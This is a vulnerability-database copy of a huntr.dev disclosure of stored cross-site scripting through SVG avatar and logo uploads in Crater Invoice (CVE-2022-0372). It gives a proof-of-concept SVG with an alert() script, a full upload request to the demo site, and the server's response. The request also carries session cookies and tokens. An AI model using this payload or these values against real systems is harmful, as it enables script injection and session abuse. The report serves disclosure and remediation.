Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntr1d8563232B9-5A93-4F4D-8389-ED805B262EF1
HistoryJan 16, 2022 - 11:58 p.m.

Cross-site Scripting (XSS) - Stored in crater-invoice/crater

2022-01-1623:58:29
1d8
www.huntr.dev
7
vulnerability
crater-invoice
upload avatar
svg files
javascript execution

EPSS

0.001

Percentile

21.4%

JSON

Description

There is a vulnerability in the upload avatar functionality of crater invoice which would allow an attacker to upload malicious .SVG files in order to execute Javascript. All that is required is that the victim browse to the link location of the .SVG file

Proof of Concept

xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("svg xss");
   </script>
</svg>

Request:

POST /api/v1/company/upload-logo HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
company: 2
X-XSRF-TOKEN: eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------202251926415456929271193356967
Content-Length: 735
Origin: https://demo.craterapp.com
DNT: 1
Connection: keep-alive
Referer: https://demo.craterapp.com/admin/settings/company-info
Cookie: __stripe_mid=7d4c8a79-b568-4a3b-a898-67c90bb47968edd571; __stripe_sid=1cf6fd84-0a75-41ee-af21-ad527c27e72ce39a5c; XSRF-TOKEN=eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJaTTJTc0E3eVZWWXhjT3BZYnJlSnc9PSIsInZhbHVlIjoiTU5jaFY5MTk4SWRRZEZYMC8zSDkxZDhLMHp0NklPU1RtQUE3dEkwRzByMGVVY3BBSG1TeUI5ZkhKRGJsWHhybThEeFNjREdyd295UmVBV0h1dVAzb3Z6U3JiZ0ErNUtPTnRYMlpBNnJXR0lWN2JObGtDKzJ0MVRMaDVpSzlKOFQiLCJtYWMiOiIxYTc1YmM3OWZiYTM4OTA3ZWIwZWU5NzA5NGIxYzRkMGM2MGJlNTI0NjcyZGQ3ZWVjNWIyMTQzMTFhOGY5NjY4IiwidGFnIjoiIn0%3D; kQ8ZSOBtOqtWUFzuaiCYX7I5LKHRDCE3lwldiGew=eyJpdiI6IkQ3VE5lWjlINkU3Y1ZvUktSdkhSS1E9PSIsInZhbHVlIjoiSFBCcDNsYVd3K3JIL3BhVWRHUWs3THBmVEl1MWtOYmo4VzUrT2p2azhzV3ZoY2lWcUk0KzlXZWJOK3ZLbUtML3N6SGxXV3FjeGU1c0lvcGwrYnlMWTByNk9mbWcrcjlSd2VtNTVZcUtiTDJvb0pyUDhmdlJZUXc3cjlJOHMzZEJscXVWZGJzRmJyRzhNcEpENnNGOWxEK3d3S200OG5hd3duZ2tCazRZaDBVUWkvZlgxaWtoNC9HenlTb2QyVmlnY2pIUSt4bmw0YnkzWGNibjNKcWxkY1B3RzV3c0pHYURnNDJMRXBkUHFrWDEvQkdORkYzK0xXTVVoSEx3YldWN0J2ZEJkTytSWU1tR0VVUFhheTVMek1XWStiZnFrZTArU0pMUFhEWE8yZStkRkpzWS9oM1hsTk00L01mY2tWSko4NFdZcUtBRlo0N0QvMWZBZmR3bVRRU29zRXJyM3RZdmpDRGE4MG9EelR2eUQzZThQK1R2dDc0dEJoMmE2OTZMT3h1eWhZdXN3bkhjVTFrTThXTStPdzhtemkzMEdKdXRoTC96RXFtSzh3MEZJanFGRjI3bGpMN3hyTllrQjk5UFdpdUNiY3ZzQThyUjF3enVvZHpkc3p3TCt3eDJnQmxvUjZQWXNmRC9aWGdQMk0rcENPNmNaaTVEbk9QWit4bitGOENKRWpSSTR2UllXZFpuYUhEQmpidE40ZXFwZHVsYkMwbk84eDBGVzVSR2w4S0pXNDgwZUU2UjJpL0tIb2ZnIiwibWFjIjoiNDRmMDY0MjE5ZTNmNmE3ZGQ5Yzg2N2U1ZTYyZDk2MzU2YWQ3YTg1MDE2Y2FlYzcyN2MyNGZlODdjYmY4ZjFiMSIsInRhZyI6IiJ9
Sec-GPC: 1

-----------------------------202251926415456929271193356967
Content-Disposition: form-data; name="company_logo"

{"name":"xss.svg","data":"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgo8c3ZnIHZlcnNpb249IjEuMSIgYmFzZVByb2ZpbGU9ImZ1bGwiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICBhbGVydCgic3ZnIHhzcyIpOwogICA8L3NjcmlwdD4KPC9zdmc+Cg=="}
-----------------------------202251926415456929271193356967--

Response:

{"success":true}

Impact

This vulnerability is capable of Javascript code execution. An attacker can use this to upload a malicious .SVG file with Javascript embedded into it, then whenever a user visits the link to the .SVG file, the malicious Javascript would execute.

Related

veracode 1
cve 1
osv 2
prion 1
nvd 1
cvelist 1
github 1
veracode
veracode
Cross-site Scripting (XSS)
2022-01-28 03:27:59
cve
cve
CVE-2022-0372
2022-01-27 08:15:07
osv
osv
CVE-2022-0372
2022-01-27 08:15:07
Cross-site Scripting in Crater Invoice
2022-01-28 00:03:42
prion
prion
Cross site scripting
2022-01-27 08:15:00
nvd
nvd
CVE-2022-0372
2022-01-27 08:15:07
cvelist
cvelist
CVE-2022-0372 Cross-site Scripting (XSS) - Stored in crater-invoice/crater
2022-01-27 07:35:10
github
github
Cross-site Scripting in Crater Invoice
2022-01-28 00:03:42

EPSS

0.001

Percentile

21.4%

JSON
Related for 563232B9-5A93-4F4D-8389-ED805B262EF1
veracode1cve1osv2prion1nvd1cvelist1github1